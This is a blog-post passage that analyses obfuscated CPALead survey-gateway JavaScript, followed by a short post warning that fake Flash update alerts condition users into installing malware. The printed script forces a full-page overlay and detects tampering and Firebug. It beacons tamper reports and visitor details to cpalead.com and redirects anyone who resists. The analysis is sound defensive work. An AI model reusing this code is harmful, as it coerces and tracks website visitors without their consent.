ll|opacity_setting_ie|_0x96be|has_closebtn|tamper|new|hasfirebug|reason|mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e|mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22|ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69|72px|return|_0xb500|000|hienslexztaecvon972b4c6959457b72d8591114abeb305d|is_donation|invalid|video_bucket|rice|appendChild|0px|styles|sgfplcetedjsqmbvbbcb115|x65|escape|x63|x72|500|video_controller|secondpass|1000|Image|tampertype|xwwjxyvbmsrjfpud17e9cae225420|innerWidth|yecqogvnndwlktmu|adixdgozwczhuvaf6e84b|png|pageWidth|pageHeight|gif|scrollHeight|scrollMaxY|firebug|225px|x74|console|settingname||secondclose|blank7|158px|lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73|navigator|nx|zIndex|appName|myGatewayStart|NzMxNTM|insertBefore|left||x69|overflow|fff|item|decoration|ems|weight|embeds|Microsoft|location|createOverlay|Explorer|x6E|url|replace|loadGatewayIframe|Internet|closebtn|ODA1OTE|scrollMaxX|OTM5ODQ|NzM5NTQ|startGateway|this|disable|offsetWidth|to|unescape|scrollWidth|removeChild|catch|e|embed|null|object|has|been|try|Your|logged|parentNode|countdownStarted|attempt|typeof|isloaded|gmgqvtjawhodlboj8b0d5f2c|bodyexisted|addWidgetLoadEvent|nextSibling|createElement|11863886|5000|closelink|riunpfcaxfcggjhpf|type|scrollbars|break|button|close|Array|close_btn|NO|css|moz|allowtransparency|640|frameborder|y|640px|11863881|482px|underline|hover|line|margin|auto|skin|help|nostyle|test|x64|11863846|contentWindow|x66|blank|about|adblock|href|surveysforcharity|org|thankyou|mygateway_iframe_loader|x68|3D|referrer|ref||11863836|subid|firstChild'.split('|'),0,{}))
Which gives us more obfuscated javascript
var widgetJSON={"settings":[{"id":"OTM5ODQ=","opacity":"99","donation_widget":"0"},{"id":"NzMxNTM=","opacity":"50","donation_widget":"0"},{"id":"NzM5NTQ=","opacity":"30","donation_widget":"0"},{"id":"ODA1OTE=","opacity":"95","donation_widget":"0"}]};function getWidgetSetting(gateid,settingname){for(var x=0;x<widgetJSON.settings.length;x++){if(widgetJSON.settings[x].id==unescape(gateid)){return widgetJSON.settings[x][settingname]}}}var popup_delay='';var countdownStarted=false;var isloaded=true;var ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=false;var cbtonfugwctexmjdff8bd9e3648ab7=false;var bodyexisted=false;var bodyloadtime=0;var mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=0;var xwwjxyvbmsrjfpud17e9cae225420='ytndhhmwdjexjqej106a67d2';var gmgqvtjawhodlboj8b0d5f2c='Your attempt to disable this widget has been logged.';function addWidgetLoadEvent(func){var oldonload=window.onload;if(typeof window.onload!='function'){window.onload=func}else{window.onload=function(){if(oldonload){try{oldonload()}catch(e){}}if(func){func()}}}}function checkForBody(gateid){var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);if(gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62==null){bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}else{myGatewayStart(gateid)}}function startGateway(gateid){if(popup_delay>0){bodyloadtime=bodyloadtime+popup_delay+'000';setTimeout("checkForBody('"+gateid+"');",popup_delay+'000')}else{bodyloadtime=bodyloadtime+300;setTimeout("checkForBody('"+gateid+"');",300)}}function yecqogvnndwlktmu(onoroff){iframe_tags=document.getElementsByTagName('iframe');for(i=0;i!=iframe_tags.length;i++){if(iframe_tags[i].id!='wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831'){if(onoroff==0){iframe_tags[i].style.visibility='hidden'}if(onoroff==1){iframe_tags[i].style.visibility='visible'}}}}function jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var embeds=document.getElementsByTagName('embed');for(var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket'){if(onoroff==0){if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute('wmode','transparent');em.style.visibility='hidden'}else{em.setAttribute('wmode','transparent');var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em);pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode','window');if(navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName('object');for(i=0;i!=object_tags.length;i++){if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket'){if(onoroff==0){object_tags[i].setAttribute('wmode','transparent');object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute('wmode','window')}}}}function getPageSize(){var c,d;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a;return arrayPageSize=new Array(pageWidth,pageHeight,a,b)}function dontscroll(){var arrayPageSize=getPageSize();if((arrayPageSize[1]-document.getElementById('aijvqsnovujrsfoj3').style.height.replace("px",""))>30){document.getElementById('aijvqsnovujrsfoj3').style.height=(arrayPageSize[1]+'px')}if(mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e==0){setTimeout("dontscroll();",500)}}function mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(gateid,adixdgozwczhuvaf6e84b){if(adixdgozwczhuvaf6e84b!=xwwjxyvbmsrjfpud17e9cae225420){top.location.href='http://www.cpalead.com/adblock.php?pub=42138'}var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.getElementById('aijvqsnovujrsfoj3');var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(1);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(1);yecqogvnndwlktmu(1);mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=1;cbtonfugwctexmjdff8bd9e3648ab7=true;if(getWidgetSetting(gateid,'donation_widget')==1&&secondclose!=true){dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.filter="alpha(opacity=0)";dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.opacity="0.0";document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='http://www.surveysforcharity.org/thankyou-overlay.php';secondclose=true}else{zcpkmswwmxlgjzbue41a138882143252732d893.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='about:blank';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='none'}return false}function guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9(tampertype){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){if(window.console&&window.console.firebug){var hasfirebug=1}else{var hasfirebug=0}dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);sgfplcetedjsqmbvbbcb115()}}function ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69(reason){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason="+reason;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73('http://www.cpalead.com/nostyle.php?pub=42138')}}function hienslexztaecvon972b4c6959457b72d8591114abeb305d(){if(!document.getElementById('aijvqsnovujrsfoj3')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-not-found')}else if(!document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-not-found')}else if(!document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-found')}else if(document.getElementById('aijvqsnovujrsfoj3').style.width!="100%"||document.getElementById('aijvqsnovujrsfoj3').style.display!="block"||document.getElementById('aijvqsnovujrsfoj3').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-styles')}else if(document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.width!="100%"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.display!="block"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-styles')}else if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display!="block"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-visible')}if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight<=300&&document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight!=0){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('iframe-height-invalid-'+document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight)}else if(document.getElementById('aijvqsnovujrsfoj3').offsetHeight<=100&&document.getElementById('aijvqsnovujrsfoj3').clientHeight<=100){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('overlay-height-invalid-'+document.getElementById('aijvqsnovujrsfoj3').offsetHeight+'-'+document.getElementById('aijvqsnovujrsfoj3').clientHeight)}setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d()",1000)}function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}function loadGatewayIframe(gateid){document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').contentWindow.location.replace('http://www.cpalead.com/mygateway_iframe_loader.php?pub=42138&subid=203.45.56.190&gateid='+gateid+'&ref='+escape(document.referrer)+'')}function createOverlay(gateid){var arrayPageSize=getPageSize();var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.createElement("div");dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.setAttribute('id','aijvqsnovujrsfoj3');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.position='absolute';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.top='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.left='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.zIndex='11863836';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.width='100%';gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.insertBefore(dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5,gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.firstChild);opacity_setting_ie=getWidgetSetting(gateid,'opacity');opacity_setting_moz=opacity_setting_ie/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_ie+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.height=(arrayPageSize[1]+'px');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='block';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.visibility='visible'}function myGatewayStart(gateid){var closebuttons=['NzMxNTM%3D'];if(!document.getElementById('aijvqsnovujrsfoj3')){createOverlay(gateid)}else{if(document.getElementById('aijvqsnovujrsfoj3').style.display='none'){document.getElementById('aijvqsnovujrsfoj3').style.display='block';opacity_setting_moz=getWidgetSetting(gateid,'opacity')/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_moz+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz}}var arrayPageSize=getPageSize();dontscroll();jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(0);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(0);var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');zcpkmswwmxlgjzbue41a138882143252732d893.style.display='block';zcpkmswwmxlgjzbue41a138882143252732d893.style.visibility='visible';zcpkmswwmxlgjzbue41a138882143252732d893.style.position='absolute';zcpkmswwmxlgjzbue41a138882143252732d893.style.top='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.left='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.zIndex='11863846';zcpkmswwmxlgjzbue41a138882143252732d893.style.width='100%';var has_closebtn=0;for(var i=0;i<closebuttons.length;i++){if(closebuttons[i]==gateid||closebuttons[i]==escape(gateid)){var is_donation=getWidgetSetting(gateid,'donation_widget');if(is_donation==1){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/rice-widget/rice-skin-close-button.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}else{document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/help/close_btn.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}var has_closebtn=1;found=i;break}}if(has_closebtn==0){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML=''}zcpkmswwmxlgjzbue41a138882143252732d893.style.height=(arrayPageSize[1]+'px');setTimeout("loadGatewayIframe('"+gateid+"');",500);document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='block';ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=true;setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d();",5000)}function secondpass(){countdown=countdown-1;document.getElementById("closelink").innerHTML=countdown;if(countdown<=0){riunpfcaxfcggjhpf()}else{setTimeout("secondpass()",1000)}}document.write('<style type="text/css">#aijvqsnovujrsfoj3{background-color: #000; filter:alpha(opacity=80); opacity: 0.80; -moz-opacity: 0.80;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a {background:none;font-weight:normal;color:#fff;text-decoration:none}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 img {border: 0px;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a:hover {background:none;font-weight:normal;color:#fff;text-decoration:underline}</style>');document.write('<div id="wzjyzgbhqzohhlhvef8426b5a89be2" style="display:none; text-align: center; line-height: normal; ">');document.write('<div id="lpepmphihufelzdd28c18f8093587772fdd38f" align="center" style="position: absolute; width: 100%; z-index: 11863866;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div id="arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c" align="center" style="position: absolute; width: 100%; z-index: 11863936;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div style="margin: 72px auto 0px; background: transparent; height: 482px; z-index: 11863881;">');document.write('<iframe width="100%" height="640" id="wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831" src="" allowtransparency="true" frameborder="0" style="position: relative; height: 640px; overflow-x: hidden; overflow-y: hidden; background-color: transparent; z-index: 11863886; " scrollbars="NO"></iframe>');document.write('</div></div>');
The next steps would be far to time consuming for me given the glaringly obvious conclusion you can draw by googleing for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php. In conclusion there isn't anything new here. The techniques aren't very advanced, but god enough to keep the general public ignorant of what's really going on. I did find the firebug / anti tamper code used in the last bit of js interesting, but I'm sure that malware analysts have seen it thousands of times before.
@dblackshell wrote about a "nifty" feature on his blog a while back. A website he uses has implemented a feature which will alert the end user if their flash version is not up to date. It delivers the message in a very authoritative looking way, as you can see in this image (click for full version).
flash-update-alert.png
I tend to disagree with his opinion. It is not "nifty", it is harmful. Although I won't go in depth here, I believe as many other do that user education does not work. Casual computer users does not have the required knowledge to determine the validity of this message at the tip of their fingers. The end result is that we train more users to click accept. What do you think this user will do the next time they are presented with this image?
flash-update-malware.jpg
The latter image is malware disguised as a flash update. Could your parents, grand parents aunts, cousins or friends tell the difference?


No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.